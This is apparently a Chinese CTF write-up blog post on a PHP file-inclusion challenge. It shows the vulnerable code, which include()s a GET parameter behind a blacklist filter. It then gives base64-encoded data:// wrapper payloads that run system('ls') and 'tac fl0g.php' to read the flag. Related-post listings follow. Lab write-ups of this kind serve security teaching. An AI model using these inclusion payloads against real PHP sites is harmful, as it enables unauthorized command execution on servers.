file_include-data

最新推荐文章于 2024-03-19 19:34:25 发布
最新推荐文章于 2024-03-19 19:34:25 发布
阅读量3k 收藏
点赞数 1
分类专栏: CTF 文章标签: 渗透测试 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44959263/article/details/121681938
版权 
<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){		//如果file参数中存在这么多元素就显示errer
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

从代码中可以看出,没有过滤data
尝试构造短标签 <?php system('ls');?> 等效于<?=system(‘ls’);

payload:http://ip/?file=data://text/plain;base64,PD89c3lzdGVtKCdscycpOw

注:需要将base64编码后的payload的等号去掉

可以发现flag文件
在这里插入图片描述

将payload中的命令修改为‘tac fl0g.php’

http://ip/?file=data://text/plain;base64,PD89c3lzdGVtKCd0YWMgZmwwZy5waHAnKTs

成功得到flag!
在这里插入图片描述

Kobalos Baku
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VS2015编译好的64位GDAL-2.20库(集成了proj-5.1.0、geos-3.6.3、FileGDB_API-1.5)
10-11
VS2015编译好的64位GDAL-2.20库,集成了proj-5.1.0、geos-3.6.3、FileGDB_API-1.5,资源中包含bin、data、html、include、lib五个目录,开发可以直接调用include和lib,bin中含有示例程序和相应的dll。
攻防世界-file_include
m0_49025459的博客
12-18 6741
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
file_include(攻防世界)
m0_56107268的博客
11-14 6913
php转化器的学习
file_include(江苏工匠杯)
最新发布
szhangliwenya的博客
03-19 47
文件包含:开发人员一般会把重复使用的函数写到单个文件中,当需要使用这个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。那正常来说包含的文件是固定的、写死的就不会存在文件包含漏洞,但是这样的话又不够便捷,所以开发人员为了使代码调用更加灵活,就会将被包含的文件设置为变量,用来进行动态调用。但正是由于这种灵活性,允许用户从客户端提交一个变量值来作为文件包含的变量值,当这个值是段恶意代码时,并且服务端又没有对用户的输入进行一个很好的过滤,就会造成文件包含漏洞。Base64编码的内容。
攻防世界-file_include-详解
chinese_cabbage0的博客
02-04 1258
主要是这个题目的解题过程和原理,可以帮助大家学习文件包含漏洞
DVWA学习记录系列(五)File Include 文件包含漏洞模块
qq_43696276的博客
10-18 842
提示:本文主要针对于File Include 文件包含漏洞全等级的分析以及相应的破解。 文章目录前言一、File Include是什么?二、实验步骤1.low级别2.Medium级别总结 前言       本次主要针对于DVWA当中的 文件包含漏洞进行学习。主要进行的是dvwa的low、medium、high级别进行破解,由于impossible模块难度过高所以都将不进行impossible的实验。 一、File Include是什么?  
fileinclude
陈艺秋的博客
07-10 851
看题目提示,应该是一道文件包含的题目,打开环境后直接告诉我flag在flag.php里但是因为不知道绝对路径,不能直接利用file读取查看源码后,发现里面嵌入了一段php代码。
FlexGraphics_V_1.79_D4-XE10.2_Downloadly.ir
11-22
Added TFlexFileFormat.StreamSupport property (default True), which difines, is it necessary to open file stream or give the file name only. - FIX: If the TCustomProp.Assign method calls when the ...
SARA_Timeseries_Utility_2013-09-24
09-30
varying environmental data including listing, graphing, computing statistics, computing meteorological data and saving in a WDM or text file. File formats supported include: WDM HSPF Binary (.hbn) ...
Synopsis-new.rar_Online file storage_storage cloud
09-19
Examples of cloud services include online file storage, social networking sites, web mail, and online business applications. In simple word a CLOUD means "The Internet (non-local storage, software ...
ap6212a0_a33_sc3817r_服务器验证通过_bt已经通了_wifi需要修改配置_需要再次验证_20170626_1549.7z
06-26
# 3G Data Card usb modeswitch File #PRODUCT_COPY_FILES += \ # $(call find-copy-subdir-files,*,device/softwinner/polaris-common/rild/usb_modeswitch.d,system/etc/usb_modeswitch.d) PRODUCT_PROPERTY_...
【攻防世界】file_include
m0_74979597的博客
09-13 1495
这个参数filename,,用户可以通过这个参数找到漏洞;1.当我使用filename=
攻防世界 -- fileinclude
weixin_48031371的博客
09-14 3245
攻防世界 -- fileinclude
[漏洞检查项] File Include | file-include | 任意文件包含
m0_46101480的博客
11-10 78
但是使用文件包含功能时,有类似于以上测试代码的设计,实现了动态包含,就有产生文件包含漏洞的风险。如果实现动态包含的参数,Web 应用没有进行严格的校验,浏览器客户端用户可以影响控制被包含文件的路径,就会产生任意文件包含漏洞。在使用某个功能的时候,直接调用此文件,无需再次编写,提高代码重用性,减少代码量。程序开发人员都希望代码更加灵活,所以会把被包含的文件的路径设置为变量,来进行动态调用(包含),但正是由于这种灵活性,如果被包含文件的路径客户端可控,造成任意文件包含漏洞。.严格过滤被包含文件的路径;
攻防世界—file_include
小缪的博客
06-10 2777
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
C语言中include包含文件的用法详解
热门推荐
蓝晴明的博客
01-16 1万+
#include命令预处理命令的一种,预处理命令可以将别的源代码内容插入到所指定的位置;可以标识出只有在特定条件下才会被编译的某一段程序代码;可以定义类似标识符功能的宏,在编译时,预处理器会用别的文本取代该宏。 平常用的比较多的就是插入头文件,include包含头文件的方式有如下几种: 1、#include<xxx.h> 这种方式下,预处理器通常只会去系统指定目录下查找。如果需要包含标...
【网络安全 | CTF】攻防世界 file_include 解题详析(php伪协议+convert转换过滤器)
等风来
07-31 4606
也就是说我们修改POC之后得到的check.php中的内容其实是逻辑判断代码,与flag无关。由代码审计可知,可通过filename参数构造POC,来读取check.php。回显的代码使用了正则表达式来匹配指定的字符串,如果输入中包含了。故猜想flag在flag.php中,修改POC即可得到flag。该题涉及到 convert转换过滤器。中的任何一个字符串,就会关闭脚本。猜测关键字被过滤,怎么办呢?题目描述:怎么读取文件呢?对于本题,将初始POC。
fileclude(文件包含漏洞及php://input、php://filter的使用)
Welcome To Myon'Blog !
04-16 3952
fileclude、文件包含漏洞、php://input、php://filter、file_get_contents() 函数、empty()函数、isset函数、PHP伪协议
fileinclude (攻防世界web)
qq_53099119的博客
10-01 1443
接下来构造payload,使用filter伪协议来读取flag.php的源码: payload: language=php://filter/convert.base64-encode/resource=/var/www/html/flag 注意,由于在源码分析中,对lan最后拼接了“.php”,因此在payload中flag后不用加。 执行后即可获得flag的base64编码。
Tomact_CVE-2020-1938漏洞复现
08-31
- *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值